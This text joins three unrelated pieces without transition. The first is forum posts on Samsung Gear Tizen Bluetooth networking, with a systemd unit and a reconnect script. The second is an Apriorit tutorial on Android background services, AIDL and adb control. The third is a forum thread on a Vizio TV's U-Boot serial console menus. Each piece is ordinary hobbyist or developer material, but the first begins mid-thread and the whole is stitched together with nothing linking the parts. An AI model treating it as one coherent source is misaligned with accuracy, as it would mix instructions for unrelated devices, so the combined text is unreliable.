This requires you to also know Java, as the nature of how this works is an android application running as a background process on your phone waiting for a SAP connection from your wearable device, then serving the content back to the device over bluetooth. I could be wrong but this appears to be a poll-only operation. You can't just send content from the host Java App without first having a fetch request from the wearable device, which to me makes it almost worthless, especially if you wanted to do any real protocol development for your gear like IRC, Facebook Messenger, etc.. that require a live streaming socket.
Btw, I have successfully tested this networking with the STOCK Tizen IDE for Wearable with the ECMA 3 Browser Support XMLHttpRequest() and can confirm that this does now work on the watch, as long as you initiated the network.
It didn't work at first but I figured out why. You must grant it internet privileges in your config.xml and also give it an access parameter under the Policy tab. Wildmatches DO work for access policy. I gave it a vague "*" with allow subdomain true, and it works just fine.
I don't know about auto-reconnect but I believe that I should be able to make a service descriptor for systemd to init your new gearnet script. The .service files are located in /usr/lib/systemd/system
I'm going to try modifying the sap.service file in there and making a new one called gearnet.service and seeing if I can get network to start upon boot.
If this works, upon starting your gear, it should automatically attempt to establish a network connection. Not sure about making it reconnect if you walked too far away from your phone and came back into range, but as long as you don't do that, networking should be possible on boot of your wearable device
successful networking upon boot
ok so I figured out how to get the watch to connect on first boot.
this is a linux operating system (tizen is a form of linux) you need some tool that can handle UTF-8 character encoding with the line ending of Unix/Linux. Typical windows notepad uses windows standard line ending which is CRLF (carrage return [ASCII CODE: 13], line feed [ASCII CODE: 10]) while I believe unix/linux just uses LF. I pulled a .service file and just modified it and saved it as a different name but I used a windows build of the popular gnome editor known as 'gedit'. WordPad will also work, but NotePad will NOT!
make a file (or pull one and modify it to keep the UNIX line endings if you plan on using wordpad), call it gearnet.service with the following code:
Code:
[Unit]
Description=GearNet service
After=weconn.service
[Service]
Type=forking
ExecStart=/sbin/gearnet
Restart=always
[Install]
WantedBy=multi-user.target
push the file to /usr/lib/systemd/system
then systemctl enable gearnet.service
shut down the watch. The problem with this is, if/when you disable bluetooth on your device (on my S4) the bluetooth tethering is turned off. you must re-enable it. make sure it's enabled before powering your watch on again. (S4 it's in settings > More Networks > Tethering and Portable Hotspot)
power on your watch, you'll see once it boots on your phone, connected to <device> then shortly after, Tethering/Portable Hotspot active.
NOTE: tested to see if the internet would come back if you walk too far away from your phone. As I suspected, this fails, while the bluetooth pairing comes back, the network does not :/ I'll have to see if I can figure a way to fix this issue, but for now, instant network access upon boot is GREAT! no more needing to connect your gear to the PC and manually start networking
EDIT
I'm looking for a better solution, but I have modified the gearnet shell script and pushed it to /sbin/gearnet. This will fix the issue of losing internet connection when walking too far away from your phone, once you come back in range, the network will also come back.
Code:
#!/bin/sh
while true; do #create a infinite loop to keep looking at your connection
NET=$(ifconfig bnep0 | grep "inet addr:") # verify if the interface has an assigned IP
if [ ! "$NET" != "" ]; then # If we don't already have an IP
btaddr=$(hcitool con | awk '{print $3}' | sort -rn | head -n 1)
if [ "$btaddr" != "" ]; then #verify there's a paired device to connect to
pand --connect $btaddr
sleep 5
dhclient bnep0
fi
fi
sleep 5
done
Author: Apriorit (Device Team)
Permanent link: www(dot)apriorit(dot)com/our-company/dev-blog/130-development-for-android
In this article I’ve described:
• How to develop simple Java service for the Android Devices;
• How to communicate with a service from the other processes and a remote PC;
• How to install and start the service remotely from the PC.
1. Java Service Development for the Android Devices
Services are long running background processes provided by Android. They could be used for background tasks execution. Tasks can be different: background calculations, backup procedures, internet communications, etc. Services can be started on the system requests and they can communicate with other processes using the Android IPC channels technology. The Android system can control the service lifecycle depending on the client requests, memory and CPU usage. Note that the service has lower priority than any process which is visible for the user.
Let’s develop the simple example service. It will show scheduled and requested notifications to user. Service should be managed using the service request, communicated from the simple Android Activity and from the PC.
First we need to install and prepare environment:
• Download and install latest Android SDK from the official web site http://developer.android.com);
• Download and install Eclipse IDE (http://www.eclipse.org/downloads/);
• Also we’ll need to install Android Development Tools (ADT) plug-in for Eclipse.
After the environment is prepared we can create Eclipse Android project. It will include sources, resources, generated files and the Android manifest.
1.1 Service class development
First of all we need to implement service class. It should be inherited from the android.app.Service (http://developer.android.com/reference/android/app/Service.html) base class. Each service class must have the corresponding <service> declaration in its package's manifest. Manifest declaration will be described later. Services, like the other application objects, run in the main thread of their hosting process. If you need to do some intensive work, you should do it in another thread.
In the service class we should implement abstract method onBind. Also we override some other methods:
onCreate(). It is called by the system when the service is created at the first time. Usually this method is used to initialize service resources. In our case the binder, task and timer objects are created. Also notification is send to the user and to the system log:
Code:
01.public void onCreate()
02.{
03. super.onCreate();
04. Log.d(LOG_TAG, "Creating service");
05. showNotification("Creating NotifyService");
06.
07. binder = new NotifyServiceBinder(handler, notificator);
08. task = new NotifyTask(handler, notificator);
09. timer = new Timer();
10.}
onStart(Intent intent, int startId). It is called by the system every time a client explicitly starts the service by calling startService(Intent), providing the arguments it requires and the unique integer token representing the start request. We can launch background threads, schedule tasks and perform other startup operations.
Code:
1.public void onStart(Intent intent, int startId)
2.{
3. super.onStart(intent, startId);
4. Log.d(LOG_TAG, "Starting service");
5. showNotification("Starting NotifyService");
6.
7. timer.scheduleAtFixedRate(task, Calendar.getInstance().getTime(), 30000);
8.}
onDestroy(). It is called by the system to notify a Service that it is no longer used and is being removed. Here we should perform all operations before service is stopped. In our case we will stop all scheduled timer tasks.
Code:
1.public void onDestroy()
2.{
3. super.onDestroy();
4. Log.d(LOG_TAG, "Stopping service");
5. showNotification("Stopping NotifyService");
6.
7. timer.cancel();
8.}
onBind(Intent intent). It will return the communication channel to the service. IBinder is the special base interface for a remotable object, the core part of a lightweight remote procedure call mechanism. This mechanism is designed for the high performance of in-process and cross-process calls. This interface describes the abstract protocol for interacting with a remotable object. The IBinder implementation will be described below.
Code:
1.public IBinder onBind(Intent intent)
2.{
3. Log.d(LOG_TAG, "Binding service");
4. return binder;
5.}
To send system log output we can use static methods of the android.util.Log class (http://developer.android.com/reference/android/util/Log.html). To browse system logs on PC you can use ADB utility command: adb logcat.
The notification feature is implemented in our service as the special runnable object. It could be used from the other threads and processes. The service class has method showNotification, which can display message to user using the Toast.makeText call. The runnable object also uses it:
Code:
01.public class NotificationRunnable implements Runnable
02.{
03. private String message = null;
04.
05. public void run()
06. {
07. if (null != message)
08. {
09. showNotification(message);
10. }
11. }
12.
13. public void setMessage(String message)
14. {
15. this.message = message;
16. }
17.}
Code will be executed in the service thread. To execute runnable method we can use the special object android.os.Handler. There are two main uses for the Handler: to schedule messages and runnables to be executed as some point in the future; and to place an action to be performed on a different thread than your own. Each Handler instance is associated with a single thread and that thread's message queue. To show notification we should set message and call post() method of the Handler’s object.
1.2 IPC Service
Each application runs in its own process. Sometimes you need to pass objects between processes and call some service methods. These operations can be performed using IPC. On the Android platform, one process can not normally access the memory of another process. So they have to decompose their objects into primitives that can be understood by the operating system , and "marshall" the object across that boundary for developer.
The AIDL IPC mechanism is used in Android devices. It is interface-based, similar to COM or Corba, but is lighter . It uses a proxy class to pass values between the client and the implementation.
AIDL (Android Interface Definition Language) is an IDL language used to generate code that enables two processes on an Android-powered device to communicate using IPC. If you have the code in one process (for example, in Activity) that needs to call methods of the object in another process (for example, Service), you can use AIDL to generate code to marshall the parameters.
Service interface example showed below supports only one sendNotification call:
Code:
1.interface INotifyService
2.{
3.void sendNotification(String message);
4.}
The IBinder interface for a remotable object is used by clients to perform IPC. Client can communicate with the service by calling Context’s bindService(). The IBinder implementation could be retrieved from the onBind method. The INotifyService interface implementation is based on the android.os.Binder class (http://developer.android.com/reference/android/os/Binder.html):
Code:
01.public class NotifyServiceBinder extends Binder implements INotifyService
02.{
03. private Handler handler = null;
04. private NotificationRunnable notificator = null;
05.
06. public NotifyServiceBinder(Handler handler, NotificationRunnable notificator)
07. {
08. this.handler = handler;
09. this.notificator = notificator;
10. }
11.
12. public void sendNotification(String message)
13. {
14. if (null != notificator)
15. {
16. notificator.setMessage(message);
17. handler.post(notificator);
18. }
19. }
20.
21. public IBinder asBinder()
22. {
23. return this;
24. }
25.}
As it was described above, the notifications could be send using the Handler object’s post() method call. The NotificaionRunnable object is passed as the method’s parameter.
On the client side we can request IBinder object and work with it as with the INotifyService interface. To connect to the service the android.content.ServiceConnection interface implementation can be used. Two methods should be defined: onServiceConnected, onServiceDisconnected:
Code:
01.ServiceConnection conn = null;
02.…
03.conn = new ServiceConnection()
04.{
05. public void onServiceConnected(ComponentName name, IBinder service)
06. {
07. Log.d("NotifyTest", "onServiceConnected");
08. INotifyService s = (INotifyService) service;
09. try
10. {
11. s.sendNotification("Hello");
12. }
13. catch (RemoteException ex)
14. {
15. Log.d("NotifyTest", "Cannot send notification", ex);
16. }
17. }
18.
19. public void onServiceDisconnected(ComponentName name)
20. {
21. }
22.};
The bindService method can be called from the client Activity context to connect to the service:
1. Context.bindService(new Intent(this, NotifyService.class),
2.conn, Context.BIND_AUTO_CREATE);
The unbindService method can be called from the client Activity context to disconnect from the service:
1.Context.unbindService(conn);
1.3 Remote service control
Broadcasts are the way applications and system components can communicate. Also we can use broadcasts to control service from the PC. The messages are sent as Intents, and the system handles dispatching them, including starting receivers.
Intents can be broadcasted to BroadcastReceivers, allowing messaging between applications. By registering a BroadcastReceiver in application’s AndroidManifest.xml (using <receiver> tag) you can have your application’s receiver class started and called whenever someone sends you a broadcast. Activity Manager uses the IntentFilters, applications register to figure out which program should be used for a given broadcast.
Let’s develop the receiver that will start and stop notify service on request. The base class android.content.BroadcastReceiver should be used for these purposes (http://developer.android.com/reference/android/content/BroadcastReceiver.html):
Code:
01.public class ServiceBroadcastReceiver extends BroadcastReceiver
02.{
03.…
04. private static String START_ACTION = "NotifyServiceStart";
05. private static String STOP_ACTION = "NotifyServiceStop";
06.…
07. public void onReceive(Context context, Intent intent)
08. {
09. …
10. String action = intent.getAction();
11. if (START_ACTION.equalsIgnoreCase(action))
12. {
13. context.startService(new Intent(context, NotifyService.class));
14. }
15. else if (STOP_ACTION.equalsIgnoreCase(action))
16. {
17. context.stopService(new Intent(context, NotifyService.class));
18. }
19.
20. }
21.}
To send broadcast from the client application we use the Context.sendBroadcast call. I will describe how to use receiver and send broadcasts from the PC in chapter 2.
1.4 Android Manifest
Every application must have an AndroidManifest.xml file in its root directory. The manifest contains essential information about the application to the Android system, the system must have this information before it can run any of the application's code. The core components of an application (its activities, services, and broadcast receivers) are activated by intents. An intent is a bundle of information (an Intent object) describing a desired action — including the data to be acted upon, the category of component that should perform the action, and other pertinent instructions. Android locates an appropriate component to respond to the intent, starts the new instance of the component if one is needed, and passes it to the Intent object.
We should describe 2 components for our service:
• NotifyService class is described in the <service> tag. It will not start on intent. So the intent filtering is not needed.
• ServiceBroadcastReceived class is described in the <receiver> tag. For the broadcast receiver the intent filter is used to select system events:
Code:
01.<application android:icon="@drawable/icon" android:label="@string/app_name">
02.…
03. <service android:enabled="true" android:name=".NotifyService"
04.android:exported="true">
05. </service>
06. <receiver android:name="ServiceBroadcastReceiver">
07. <intent-filter>
08. <action android:name="NotifyServiceStart"></action>
09. <action android:name="NotifyServiceStop"></action>
10. </intent-filter>
11. </receiver>
12.…
2. Java service remote installation and start
2.1 Service installation
Services like the other applications for the Android platform can be installed from the special package with the .apk extension. Android package contains all required binary files and the manifest.
Before installing the service from the PC we should enable the USB Debugging option in the device Settings-Applications-Development menu and then connect device to PC via the USB.
On the PC side we will use the ADB utility which is available in the Android SDK tools directory. The ADB utility supports several optional command-line arguments that provide powerful features, such as copying files to and from the device. The shell command-line argument lets you connect to the phone itself and issue rudimentary shell commands.
We will use several commands:
• Remote shell command execution: adb shell <command> <arguments>
• File send operation: adb push <local path> <remote path>
• Package installation operation: adb install <package>.apk
I’ll describe the package installation process in details. It consists of several steps which are performed by the ADB utility install command:
• First of all the .apk package file should be copied to the device. The ADB utility connects to the device and has limited “shell” user privileges. So almost all file system directories are write-protected for it. The /data/local/tmp directory is used as the temporary storage for package files. To copy package to the device use the command:
adb push NotifyService.apk /data/local/tmp
• Package installation. ADB utility uses special shell command to perform this operation. The “pm” (Package Manager?) utility is present on the Android devices. It supports several command line parameters which are described in the Appendix I. To install the package by yourself execute the remote shell command:
adb shell pm install /data/local/tmp/NotifyService.apk
• Cleanup. After the package is installed, ADB removes the temporary file stored in /data/local/tmp folder using the “rm” utility:
adb shell rm /data/local/tmp/NotifyService.apk.
• To uninstall package use the “pm” utility:
adb shell pm uninstall <package>
2.2 Remote service control
To be able to start and stop the NotifyService from the PC we can use the “am” (Activity Manager?) utility which is present on the Android device. The command line parameters are described in the Appendix II. The “am” utility can send system broadcast intents. Our service has the broadcast receiver which will be launched by the system request.
To start NotifyService we can execute remote shell command:
adb shell am broadcast –a NotifyServiceStart
To stop the NotifyService we can execute remote shell command:
adb shell am broadcast –a NotifyServiceStop
Note, that the NotifyServiceStart and NotifyServiceStop intents were described in the manifest file inside the <receiver> … <intent-filter> tag. Other requests will not start the receiver.
Appendix I. PM Usage (from Android console)
Code:
01.pm [list|path|install|uninstall]
02.pm list packages [-f]
03.pm list permission-groups
04.pm list permissions [-g] [-f] [-d] [-u] [GROUP]
05.pm path PACKAGE
06.pm install [-l] [-r] PATH
07.pm uninstall [-k] PACKAGE
08.
09.The list packages command prints all packages.
10.Use the -f option to see their associated file.
11.The list permission-groups command prints all known permission groups.
12.The list permissions command prints all known permissions, optionally
13.only those in GROUP.
14.
15.Use the -g option to organize by group.
16.Use the -f option to print all information.
17.Use the -s option for a short summary.
18.Use the -d option to only list dangerous permissions.
19.Use the -u option to list only the permissions users will see.
20.
21.The path command prints the path to the .apk of a package.
22.
23.The install command installs a package to the system. Use the -l option to
24. install the package with FORWARD_LOCK. Use the -r option to reinstall an
25.exisiting app, keeping its data.
26.The uninstall command removes a package from the system. Use the -k option
27.to keep the data and cache directories around after the package removal.
Appendix II. AM Usage (from Android console)
Code:
01.am [start|broadcast|instrument]
02.am start -D INTENT
03.am broadcast INTENT
04.am instrument [-r] [-e <ARG_NAME> <ARG_VALUE>] [-p <PROF_FILE>] [-w] <COMPONENT>
05.
06.INTENT is described with:
07. [-a <ACTION>] [-d <DATA_URI>] [-t <MIME_TYPE>]
08. [-c <CATEGORY> [-c <CATEGORY>] ...]
09. [-e|--es <EXTRA_KEY> <EXTRA_STRING_VALUE> ...]
10. [--ez <EXTRA_KEY> <EXTRA_BOOLEAN_VALUE> ...]
11. [-e|--ei <EXTRA_KEY> <EXTRA_INT_VALUE> ...]
12. [-n <COMPONENT>] [-f <FLAGS>] [<URI>]
13.
14.<h2>
Sources of the Sample Project can be downloaded at the article official page www(dot)apriorit(dot)com/our-company/dev-blog/130-development-for-android
All articles, code pieces, example project sources and other materials are the intellectual property of Apriorit Inc. and their authors.
All materials are distributed under the Creative Commons BY-NC License.
Backstory: I have an old (2008?) vizio VA22L FHDTV10T. 1920x1080 60hz panel. I want to connect it to my pc, but if I use anything other than the VGA port (eg HDMI) it overscans and applies all this crap to the image. It's clear and crisp and beautiful if I use VGA (tested with old VGA gpu), but alas, my pc doesn't have a VGA output. (Yes I tried all the settings, no they don't fix it. Yes, I tried adjusting the graphics driver settings, no they haven't fixed it without being a PITA every time I turn the tv off.)
On to the important stuff: I can access the tv with a serial connection via "Service port" and can see a Das U-boot boot sequence and issue commands. I just don't know linux and can't get anywhere past the help menus. If someone could guide me on modifying this thing I'd be rather grateful!
For starters, here's the output when I first turn it on whilst pc is plugged in via VGA, wait for it to finish booting, and press enter.
PS: using PuTTY @ 115200baud
Code:
▒Boot-
Bank 0 : DQS(3 ~ 42), Size 39, Middle = 22
Bank 1 : DQS(-1 ~ 41), Size 42, Middle = 20
DRAM is set as 16 bits
Boot
Starting C main
0x00001b04
LZHS addr:0x00001b80
LZHS size:0x0002fcd8
LZHS checksum:0x00000084
U-Boot 1.1.4 (Oct 9 2009 - 12:58:21)
U-Boot code: 00D00000 -> 00D2FCD8 BSS: -> 00D7430C
RAM Configuration:
Bank #0: 00000000 64 MB
Detect flash #0: MXIC(25L320)
Flash: 4 MB
0.0.0.0
In: serial
Out: serial
Err: serial
DramSizing: 0x02000000
Finding Image...
Decompression image to 0x00010000...
Booting
Nucleus Heap is at 0x00603208(0x00be5f80)
Main task stack is at 0x00603218 (0x00002000)
============================================
Memory for Image at 0x00010000(0x005eda08):
Memory for OSAI at 0x00605228(0x00ae5f80)
Memory Reserved for ARM lib at 0x010ec000(0x00100000)
Memory Reserved for FBM at 0x011ec000(0x00e10000)
Memory Reserved for MMU at 0x01ffc000(0x00004000)
Find panel index 102(PANEL_LG_LM215WF1) from GPIO
TunerInit.....................MUSBStack-S v2.303 Init pBase = 0x20029000.
Image ROBase:0x0001099c ROLimit:0x004483f4
Protect readonly memory from 0x00000000 to 0x004483e8
MMU protect: 0x01ffc000 ~ 0xfffffff8
Successed to initialize Memory Intrusion Detection!
DTV>Detect flash #0: MXIC(25L320)
[SRM] DISP CTRL 0 0 0 0
[SRM] DISP CTRL 0 1 0 0
[DM] VT = 1111 (1111)
DM Panel V(1089 1099 1200) H(1999 2175 2239) P(120000000 143472527 175000000) F(50 75)
DM H MIN(1800 2048) H MAX(2624)
DM OK V(1111) H(2176) F(60)
[DM] VT = 1111 (1111)
DM OK HS(254)
[DM] VT = 1111 (1111)
DM Panel V(1089 1099 1200) H(1999 2175 2239) P(120000000 143472527 175000000) F(50 75)
DM H MIN(1800 2048) H MAX(2624)
DM OK V(1111) H(2176) F(60)
[DM] VT = 1111 (1111)
DM OK HS(254)
Watchdog enable:405000000
W: 1920 H: 1080 Rate: 60 DSH:800 DSV: 800 USH: 800 USV: 800 VSP: 0 TUNE: 0 bStackSize: 1
[Help]
cd: Change current directory
do: Repeat command
alias(a): Add/Show current alias
read(r): Memory read(word)
write(w): Memory write(word)
basic_(b): basic command
mtktool(0): mtktool command
customer(cust): Get customer name
pmx: pmx (scpos) command
musb: MUSB command
sif: Sif command
eeprom: Eeprom command
nim: Nim command
ir: Ir command
rtc(rtc): RTC commands
aud: Aud command
nptv(n): Nptv command
dbs: Dbs command
dmx(d): Demux commands
memtest: Memory test
pdwnc(pdwnc): PDWNC commands
bwt: BWT command
gpio: Gpio interface
DTV>
Again, thanks in advance!
Mmm, so right after posting, I figured out that I had to change directory to one of the commands listed in the first help in order to issue commands from the sub-help of each one instead of using them as arguments. EG: cd pmx [enter] pattern 1 [enter] would turn on the test pattern instead of pmx pattern or pmx pattern 1 or pmx -p and other such variants. There's probably a guide for this out there somewhere but most of my searches just turned up historical info on German submarines... Oh, and this thread which is kinda along the same lines: https://forum.xda-developers.com/android/software/rooting-mediatek-based-linux-smart-tv-t3150281
I guess now I just have to find which setting(s) fix my apparent problem, then I'll need to append the firmware, assuming I can't do it from the serial console. And that'll be the part I definitely need help with.
Maybe I can just use commands to do this, but I don't know what most of this is, and my searches aren't yielding much... That said, I can run the commands and post back the results since I don't expect anyone to have this same model.
Here's the menu and submenus with my comments in quotes:
Code:
cd: Change current directory "Figured out this one"
do: Repeat command "Self explanatory"[HIDE]
Usage: do loop cmd ex: do 10 read 0x200 0x10
CLI Command Return Value (-1)[/HIDE]
alias(a): Add/Show current alias "not quite sure what this does"
read(r): Memory read(word) "I guess these are self explanatory? no output if I just run the commands"
write(w): Memory write(word)
basic_(b): basic command [HIDE]
[Help]
stop: Stop RS232 transparent mode
sv: System mode detection
version(ver): System version/build date
reboot: System reboot/restart
getpllclk(gpc): close loop, gpc [cpu|sys|ps|vo|adc|b2r|apl1|apl2] [[band num]]
backup(bk): backup command
[/HIDE]
mtktool(0): mtktool command "the help kinda explains?[HIDE]
[Help]
et: Enter RS232 transparent mode
ft: Set RS232 factory mode
st: Stop RS232 transparent mode[/HIDE]
customer(cust): Get customer name "returns [TPV] and nothing more"
pmx: pmx (scpos) command "looks promising?"[HIDE]
[Help]
enable(e): enable/disable LVDS
pattern(p): enable/disable test pattern
list(l): show panel list
query(q): dump pmx(scpos) info
set(s): set parameter
[/HIDE]
musb: MUSB command "probably controls the usb port on the back?" [HIDE]
[Help]
debug_on(d_on): MUSB.d_on
debug_off(d_off): MUSB.d_off
debug_level(d_l): MUSB.d_l
init(i): MUSB init
speed(speed): MUSB speed
hmsd(hm): MUSB host msd test
htst(ht): MUSB host compilance test
suspend(s): USB bus suspend
resume(r): USB bus resume
[/HIDE]
sif: Sif command "I know what edid is basically, maybe I could make the computer think this is a non-hdtv type connection?"[HIDE]
[Help]
init(i): Sif init
read(r): Sif read
write(w): Sif write
writebyte(wb): Sif write byte
hdcp: Sif write HDCP SRAM default value
rhdcp: Sif read HDCP
wbhdcp: Sif write byte to HDCP
rbhdcp: Sif read byte from HDCP
wallhdcp(wah): Sif write all 320 bytes to HDCP
rallhdcp(rah): Sif read all 320 bytes from HDCP
edid: Sif write EDID default value
redid: Sif read EDID
walledid(wae): Sif write all 256 bytes to EDID
ralledid(rae): Sif read all 256 bytes from EDID
tunerread(tr): Tuner I2C No-sub-addr read
tunerwrite(tw): Tuner I2C No-sub-addr write
multipleread(mr): Multiple sub-addr I2C read
multiplewrite(mw): Multiple sub-addr I2C write
scan1(s1): Scan BUS0 (System I2C)
scam2(s2): Scan BUS1 (Tuner I2C)
sif_x_read(xr): fully functional sif read
sif_x_write(xw): fully functional sif write
edidreadbyte(edidrb): edid read byte
[/HIDE]
eeprom: Eeprom command "there's an 8 pin eeprom on the mainboard" [HIDE]
[Help]
readbyte(rb): eeprom.rb [eeprom-offset]
writebyte(wb): eeprom.wb [eeprom-offset] [byteval]
uartwrite(uw): Get data from Uart and write to eeprom.[/HIDE]
nim: Nim command "I assume this controls the onboard tv tuner"[HIDE]
[Help]
id: Set Tuner ID
ver: Tuner version
dtd: Nim dtd
atd: Nim atd
d_l: Set Debug Level
go: Start Nim
up: Channel Up
down: Channel Down
channel: Channel Set
freq: Freq Set
init(i): Nim init
open(o): Nim open
close(c): Nim close
setcable(sc): Nim set cable parameters
setBW(sbw): Nim set BW
getcablelevel(gclv): Nim get cable signal level
getcablesignal(gcsc): Nim get cable signal parameter
getcablelock(gclk): Nim get cable lock status
detachmw(dm): Nim Detach MW
detachi2c(dei2c): Detach Tuner I2C
[/HIDE]
ir: Ir command "InfraRed as in the remote I s'pose" [HIDE]
rx(rx): RX commands
[/HIDE]
rtc(rtc): RTC commands "returns [HELP] and nothing more. Real Time Clock I'd wager unless that has another meaning"
aud: Aud command "onboard speakers and other audio functions"[HIDE]
[Help]
ptsdly(ptsd): Delay audio startup by increasing PTS
dd_banner(banner): DD banner turn on for DD Test
spdif: spdif command
adac: adac command
interdac: inter dac command
dsp: dsp command
uop: audio uop
cfg: configuration
t: test
Clip: Aud Clip
factory(fac): Factory mode
[/HIDE]
nptv(n): Nptv command "not the foggiest idea of what these do."[HIDE]
[Help]
Ycproc(ycproc): YCPROC Command
TVD(tvd): TVD Command
NR(nr): NR Command
SCART(scart): SCART Command[/HIDE]
dbs: Dbs command "not this either"[HIDE]
[Help]
init(i): Dbs init
print(p): Dbs print at once
reset(r): Dbs reset[/HIDE]
dmx(d): Demux commands "This looks like the solution, except... the one command does nothing..."[HIDE]
[Help]
query(q):[/HIDE]
memtest: Memory test[HIDE][Help]
run(r): Memory test[/HIDE]
pdwnc(pdwnc): PDWNC commands "another one that just returns [Help]. no idea what it is"
bwt: BWT command "BandWidth Testing. not what I'm looking for I don't think"[HIDE]
[Help]
init: BandWidth Testing Preliminaries
testing: BandWidth Testing (BWT)
report: BandWidth Testing Report
chgchannel: Change Channel Number
dtv: BWT for DTV
atv: BWT for ATV
cvbs: BWT for CVBS
ypbpr: BWT for YPbPr
hdmi: BWT for HDMI
vga: BWT for VGA
src: Get current input source
mtime: Set BWT measure time
pippop: BWT for PIP/POP[/HIDE]
gpio: Gpio interface "General Purpose I/O. Don't think this is what I need either as it's hardware" [HIDE]
[Help]
output(out): gpio.out [gpio num] [[0|1]]
input(in): gpio.in [gpio num]
servo(servo): gpio.servo [0-4][/HIDE]
Wake times are also over 10 seconds, and the bright blue when there's no signal is rather jarring, so I suppose I'll need to extract and modify the firmware. Can anybody help with this?
Bump I s'pose. Still stuck, so for now I'm working on other things till I find someone who can help with this. I'd rather not drop $25 on a chinese basic mainboard for the panel or whatever I can get away with paying for a dubious identical-looking universal mainboard.
So I'm at it again trying to make this work. Glad I posted everything I did since I totally forgot how to work this thing... Still need help. I'm trying to dump the firmware with u boot so I can try to modify and reupload it with my custom values.
I also have this TV and would like to disable overscan. How should I connect my PC to one of its service ports? It has two service ports: a type A USB port and some port that I think is called 'ISP' or something like that. For what it's worth, I already have several USB to RS232 adapters (male USB type A on one end of the cable, male RS232 on the other end of the cable), but this TV doesn't have an RS232 port. I've already downloaded a third-party PuTTy app ("PuTTy (Unofficial)", if I recall correctly, from the Microsoft Store).
Edit: Made a correction.
I also have an adapter that is USB type B on both ends. It is called "SharkPort", IIRC. It was designed for connecting a PC to a PlayStation 2 to transfer PS2 game save files. It *might* be a USB host-to-host adapter. It is probably USB 1.0 or 1.1.
Big love for this thread even though I'm probably useless at the moment.
I'm ambitiously following some of your footsteps to tinker with my all-but-entirely defunct Vizio E3D420VX.
Curious how this story played out though; it looks like it relies more on TV knowledge than Linux-- these settings are pretty dense.